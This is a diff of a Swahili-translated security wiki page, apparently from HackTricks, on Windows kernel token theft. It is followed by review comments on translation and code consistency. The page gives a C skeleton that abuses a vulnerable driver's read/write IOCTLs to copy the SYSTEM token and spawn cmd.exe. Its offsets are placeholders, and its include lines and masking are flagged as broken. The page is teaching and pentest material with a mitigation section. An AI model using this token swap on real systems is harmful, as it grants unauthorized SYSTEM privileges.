+- Futa bit 3 za chini: Token_SYS_masked = Token_SYS & ~0xF (kawaida ~0xF au ~0x7 kulingana na build; kwenye x64 bit 3 za chini zinatumika — mask 0xFFFFFFFFFFFFFFF8). +5) Chaguo A (kawaida): Hifadhi bit 3 za chini kutoka token yako ya sasa na ziweke kwenye pointer ya SYSTEM ili kuweka reference count iliyojengwa iwe thabiti. +- Token_ME = *(EPROCESS_SELF + TokenOffset) +- Token_NEW = (Token_SYS_masked | (Token_ME & 0x7)) +6) Andika Token_NEW kurudi ndani ya (EPROCESS_SELF + TokenOffset) kwa kutumia kernel write primitive yako. +7) Mchakato wako wa sasa sasa ni SYSTEM. Hiari anzisha cmd.exe mpya au powershell.exe kuthibitisha. + +## Pseudocode + +Chini ni skeleton inayotumia tu IOCTL mbili kutoka kwa driver dhaifu, mojawapo kwa 8-byte kernel read na mojawapo kwa 8-byte kernel write. Badilisha na interface ya driver yako. +```c +#include +#include +#include + +// Device + IOCTLs are driver-specific +#define DEV_PATH "\\\\.\\VulnDrv" +#define IOCTL_KREAD CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define IOCTL_KWRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS) + +// Version-specific (examples only – resolve per build!) 
+static const uint32_t Off_EPROCESS_UniquePid = 0x448; // varies +static const uint32_t Off_EPROCESS_Token = 0x4b8; // varies +static const uint32_t Off_EPROCESS_ActiveLinks = 0x448 + 0x8; // often UniquePid+8, varies + +BOOL kread_qword(HANDLE h, uint64_t kaddr, uint64_t *out) { +struct { uint64_t addr; } in; struct { uint64_t val; } outb; DWORD ret; +in.addr = kaddr; return DeviceIoControl(h, IOCTL_KREAD, &in, sizeof(in), &outb, sizeof(outb), &ret, NULL) && (*out = outb.val, TRUE); +} +BOOL kwrite_qword(HANDLE h, uint64_t kaddr, uint64_t val) { +struct { uint64_t addr, val; } in; DWORD ret; +in.addr = kaddr; in.val = val; return DeviceIoControl(h, IOCTL_KWRITE, &in, sizeof(in), NULL, 0, &ret, NULL); +} + +// Get ntoskrnl base (one option) +uint64_t get_nt_base(void) { +LPVOID drivers[1024]; DWORD cbNeeded; +if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded >= sizeof(LPVOID)) { +return (uint64_t)drivers[0]; // first is typically ntoskrnl +} +return 0; +} + +int main(void) { +HANDLE h = CreateFileA(DEV_PATH, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); +if (h == INVALID_HANDLE_VALUE) return 1; + +// 1) Resolve PsInitialSystemProcess +uint64_t nt = get_nt_base(); +uint64_t PsInitialSystemProcess = nt + /*offset of symbol*/ 0xDEADBEEF; // resolve per build + +// 2) Read SYSTEM EPROCESS +uint64_t EPROC_SYS; kread_qword(h, PsInitialSystemProcess, &EPROC_SYS); + +// 3) Walk ActiveProcessLinks to find current EPROCESS +DWORD myPid = GetCurrentProcessId(); +uint64_t cur = EPROC_SYS; // list is circular +uint64_t EPROC_ME = 0; +do { +uint64_t pid; kread_qword(h, cur + Off_EPROCESS_UniquePid, &pid); +if ((DWORD)pid == myPid) { EPROC_ME = cur; break; } +uint64_t flink; kread_qword(h, cur + Off_EPROCESS_ActiveLinks, &flink); +cur = flink - Off_EPROCESS_ActiveLinks; // CONTAINING_RECORD +} while (cur != EPROC_SYS); + +// 4) Read tokens +uint64_t tok_sys, tok_me; +kread_qword(h, EPROC_SYS + Off_EPROCESS_Token, &tok_sys); +kread_qword(h, 
EPROC_ME + Off_EPROCESS_Token, &tok_me); + +// 5) Mask EX_FAST_REF low bits and splice refcount bits +uint64_t tok_sys_mask = tok_sys & ~0xF; // or ~0x7 on some builds +uint64_t tok_new = tok_sys_mask | (tok_me & 0x7); + +// 6) Write back +kwrite_qword(h, EPROC_ME + Off_EPROCESS_Token, tok_new); + +// 7) We are SYSTEM now +system("cmd.exe"); +return 0; +} +``` +Vidokezo: +- Offsets: Tumia WinDbg’s `dt nt!_EPROCESS` na PDBs za lengo, au runtime symbol loader, ili kupata offsets sahihi. Usifanye hardcode bila tahadhari. +- Mask: On x64 the token is an EX_FAST_REF; low 3 bits are reference count bits. Kuendelea na low bits za asili kutoka token yako kuepuka matatizo ya refcount mara moja. +- Stability: Pendelea kuinua current process; ikiwa unainua helper mfupi unaweza kupoteza SYSTEM anapoondoka. + +## Ugunduzi na kupunguza +- Kupakia unsigned au untrusted third‑party drivers ambazo zinaonyesha IOCTLs zenye nguvu ndizo chanzo cha tatizo. +- Kernel Driver Blocklist (HVCI/CI), DeviceGuard, and Attack Surface Reduction rules zinaweza kuzuia vulnerable drivers kupakiwa. +- EDR inaweza kuangalia mfululizo wa IOCTL unaoshukiwa ambao unatekeleza arbitrary read/write na token swaps. + +## Marejeleo +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [FuzzySecurity – Windows Kernel ExploitDev (token stealing examples)](https://www.fuzzysecurity.com/tutorials/expDev/17.html) + +{{#include ../../banners/hacktricks-training.md}}
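Review bot: In the hunk spanning `### AlwaysInstallElevated` through `### From LOCAL SERVICE or NETWORK SERVICE to full privs`, the retranslation leaves English verb phrases embedded in Swahili grammar, e.g. "Ikiwa utafanikiwa **hijack a dll** inayopakiwa" reads as a gap; "Ikiwa utafanikiwa kufanya hijack ya dll inayopakiwa" keeps the term while staying grammatical. The same hunk uses "idhini hizo", "privileges" and "ruhusa" for the same concept within a few lines; pick one term (the rest of the diff settles on "privileges") so the section headings "High + SeImpersonate privilege to System" and "From SeDebug + SeImpersonate to Full Token privileges" match the body text.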
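Review bot: The `@@ -1558,45 +1571,45 @@` tool-list hunk introduces a few spelling and translation errors: "zinazojuikana" should be "zinazojulikana" on both the Sherlock and Watson lines; "kwa lokaal" (SessionGopher) and "lokal" (WINspect, the two exploit-suggester lines) are inconsistent and neither is Swahili, "kwa matumizi ya ndani" / "ya ndani" would do; "exe imeprecompiled kwenye github" (LaZagne) reads better as "exe iliyojengwa tayari (precompiled) kwenye github"; "Orodhesha host akitafuta misconfigurations" (SeatBelt) uses the animate prefix, "Inaorodhesha host ikitafuta misconfigurations"; and "IMEACHWA kwa Watson" (Sherlock) loses the meaning of "deprecated for Watson", i.e. superseded by it, so "IMEACHWA badala ya Watson" is clearer.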
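Review bot: The `@@ -1617,4 +1630,6 @@` hunk adds only the external 0xdf write-up to the README's reference list, but nothing in the README body links to the new page `arbitrary-kernel-rw-token-theft.md` created in the same commit, so readers of this page reach it only through the sidebar. Suggest adding a short pointer next to the related "From High Integrity to System" material, e.g. "- [Kernel token theft with arbitrary R/W](arbitrary-kernel-rw-token-theft.md)", in the same link style the README already uses for `sedebug-+-seimpersonate-copy-token.md`.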
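Review bot: In the new-file hunk `@@ -0,0 +1,122 @@`, the three `+#include` lines have lost their header names (the angle-bracket targets appear to have been stripped as HTML), so the snippet as rendered does not compile; restore `<windows.h>`, `<psapi.h>` (for `EnumDeviceDrivers`), `<stdint.h>` and `<stdlib.h>` (for `uint64_t` and `system`) inside the fence. The EX_FAST_REF masking is also described inconsistently within the same hunk: step 4 says `Token_SYS & ~0xF` and, in the same bullet, "mask 0xFFFFFFFFFFFFFFF8" (which is `~0x7`); the code clears with `~0xF` but splices with `tok_me & 0x7`; and the Notes say "low 3 bits". Pick the width from `dt nt!_EX_FAST_REF` on the target build (the page already recommends WinDbg for `_EPROCESS`) and use one constant for both the clear and the splice, stating it under the "Offsets" note. Smaller points: "Zidhibitio" in the blockquote is garbled (likely "Zitatue", i.e. resolve them dynamically); the heading "Hatua za juu" reads as "upper steps" where "Muhtasari wa hatua" conveys "high-level steps"; the Notes bullet "Mask: On x64 the token is an EX_FAST_REF; low 3 bits are reference count bits." and the "and" in "DeviceGuard, and Attack Surface Reduction rules" are left untranslated in an otherwise Swahili page. Finally, the "Ugunduzi na kupunguza" section names unsigned/untrusted driver loading as the root cause but gives no telemetry a defender would actually watch; since the page itself states this, a sentence pointing at driver-load events as the thing to monitor would make the section actionable.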